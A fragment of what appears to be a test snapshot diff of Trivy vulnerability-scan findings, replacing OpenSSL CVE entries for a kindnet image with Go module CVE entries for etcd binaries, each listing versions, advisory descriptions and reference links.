"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + 